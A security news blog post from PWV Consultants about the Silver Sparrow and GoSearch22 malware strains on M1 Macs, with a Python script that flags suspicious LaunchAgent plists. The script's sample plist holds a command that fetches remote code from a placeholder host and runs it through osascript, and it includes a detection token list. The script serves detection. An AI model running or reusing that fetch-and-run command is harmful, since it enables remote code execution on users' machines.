Ominous Silver Sparrow Infects Nearly 30,000 Macs

Two novel strains of malware that run natively on Apple’s M1 processor have been discovered. Silver Sparrow remains a mystery with no determined payload.

There has long been a myth circulating on the internet that macOS doesn’t get viruses. Some people even believe that Macs can’t get a virus. Neither of those things is true. For many years there were few viruses written for macOS simply because Macs weren’t as widely used as other PCs. The ability to write them has always existed, but it was never lucrative for threat actors. Today it’s very different. Two separate forms of malware designed to run natively on Apple’s M1 processor were discovered within a week of each other this month: GoSearch22 and Silver Sparrow.

The first piece of malware was discovered by security researcher Pat Wardle on February 14. It is adware belonging to the Pirrit family, and its malicious extension, GoSearch22, had its certificate revoked by Apple. That revocation means this version of GoSearch22 won’t run on macOS anymore, at least not unless its authors re-sign it with another developer key.

The second piece of malware was discovered by research firm Red Canary, which named the malware Silver Sparrow. It was reported on February 17, a mere three days after the discovery of GoSearch22. There is something different about this one, though. From the Red Canary blog post:

“Earlier this month, Red Canary detection engineers Wes Hurd and Jason Killam came across a strain of macOS malware using a LaunchAgent to establish persistence. Nothing new there. However, our investigation almost immediately revealed that this malware, whatever it was, did not exhibit the behaviors that we’ve come to expect from the usual adware that so often targets macOS systems. The novelty of this downloader arises primarily from the way it uses JavaScript for execution—something we hadn’t previously encountered in other macOS malware—and the emergence of a related binary compiled for Apple’s new M1 ARM64 architecture.”

There’s more that’s different, too. First, researchers have yet to determine how this malware infected almost 30,000 macOS endpoints. Second, there doesn’t seem to be a payload: once an hour the infected Macs check a command-and-control server to see if there are any new commands to execute. Third, it includes a mechanism to remove itself.

This malware presents a number of problems. Experts are stumped because they don’t know what it does. Malware isn’t designed for no reason, so what is the purpose here? Is it waiting for some specific set of criteria to be met, at which time it will unleash its wrath? Is it a scout program designed to measure how systems respond, length of time to detection and other factors which make it easier to hide? And how did it get there in the first place?

The assumption is that this is some type of adware similar to, yet clearly distinct from, the first strain of malware found. Theories about what it does range from nothing to a plethora of damage, depending on who you ask. Silver Sparrow had been found in 153 countries as of February 17, including the US, UK, Canada, France and Germany. Such a widespread footprint is also cause for concern, especially with more consumers and businesses turning to Apple as an alternative to other operating systems that regularly suffer complex, intricate strains of malware that are costly and frustrating to deal with. But the more users turn to Apple, the more threat actors will develop strains of malware that run on macOS.

It is incredibly important for anyone who uses a Mac, whether for personal or business use, to check whether their machine is infected. You can visit the Red Canary post for full details on how to tell if your machine is infected and how to remove the malware. We highly recommend doing this. Even if no one knows what the malware does, it’s pretty safe to assume it’s not going to do anything good.
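The article describes Silver Sparrow's persistence through a LaunchAgent, its hourly check-in with a control server and its JavaScript-based execution, and defers to the Red Canary post for the actual indicators. As an added defender-side illustration (not code from the article, Red Canary or Apple), the script below scores LaunchAgent plists against those generic traits; the sample plist, the token list and the interval thresholds are constructed assumptions, not published Silver Sparrow indicators.

```python
import plistlib
from pathlib import Path

# Constructed sample plist (an assumption for illustration, not a real artifact):
# an hourly StartInterval plus a curl-to-JavaScript pipeline mirrors the traits described.
SAMPLE_PLIST = b"""<?xml version="1.0" encoding="UTF-8"?>
<plist version="1.0"><dict>
  <key>Label</key><string>example.updater</string>
  <key>ProgramArguments</key><array>
    <string>/bin/sh</string><string>-c</string>
    <string>curl -s https://example.invalid/check | osascript -l JavaScript</string>
  </array>
  <key>RunAtLoad</key><true/>
  <key>StartInterval</key><integer>3600</integer>
</dict></plist>
"""

# Heuristic tokens chosen for this example, not indicators published for Silver Sparrow.
SUSPICIOUS_TOKENS = ("osascript", "JavaScript", "curl", "/tmp/", "/var/tmp/")

def score_launch_agent(plist_bytes):
    """Return (score, reasons) for one LaunchAgent plist; a higher score means look closer."""
    data = plistlib.loads(plist_bytes)
    args = list(data.get("ProgramArguments") or [])
    if isinstance(data.get("Program"), str):  # launchd also accepts a bare Program key
        args.insert(0, data["Program"])
    cmdline = " ".join(str(a) for a in args)
    reasons = [f"command line contains {t!r}" for t in SUSPICIOUS_TOKENS if t in cmdline]
    interval = data.get("StartInterval")
    if isinstance(interval, int) and 1500 <= interval <= 4000:
        reasons.append(f"StartInterval {interval}s: roughly hourly check-in")
    if data.get("RunAtLoad"):
        reasons.append("RunAtLoad set: runs again at every login")
    return len(reasons), reasons

def scan_launch_agents(dirs=None):
    """Score every *.plist in the per-user and system-wide LaunchAgents folders."""
    dirs = dirs or [Path.home() / "Library/LaunchAgents", Path("/Library/LaunchAgents")]
    results = {}
    for d in dirs:
        for p in Path(d).glob("*.plist"):
            try:
                results[str(p)] = score_launch_agent(p.read_bytes())
            except Exception as exc:  # binary or corrupt plist, permission problems, etc.
                results[str(p)] = (0, [f"unreadable: {exc}"])
    return results

if __name__ == "__main__":
    flagged = {p: r for p, (s, r) in scan_launch_agents().items() if s >= 2}
    print(flagged or "no LaunchAgent matched two or more heuristics")
```

A hit only means the agent deserves a manual look; compare it against the indicators in the Red Canary post before removing anything.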

Malware and other cybersecurity threats are not going anywhere, no matter which OS you use. There are strains for every OS in use, and this is a prime example. The M1 processor was released just last year and already there are two strains of malware that run natively on it, even though it is designed only for Macs, which make up a fraction of the machines in use today. Play it safe and be proactive: hunt that malware down now and eradicate it from your system before it actually does something bad. Apple revoked Silver Sparrow’s certificate so it can no longer spread, so fix the problem now and get ahead of the threat actors.

About the Author

PWV Consultants is a boutique group of industry leaders and influencers from the digital tech, security and design industries that acts as a trusted technical partner for many Fortune 500 companies, high-visibility startups, universities, defense agencies, and NGOs. It was founded by 20-year software engineering veterans who have founded or co-founded several companies. PWV experts act as trusted advisors and mentors to numerous early-stage startups, and have held the titles of software and software security executive, consultant and professor. PWV's expert consulting and advisory work spans several high-impact industries in finance, media, medical tech, and defense contracting. PWV's founding experts also authored the highly influential precursor HAZL (jADE) programming language.
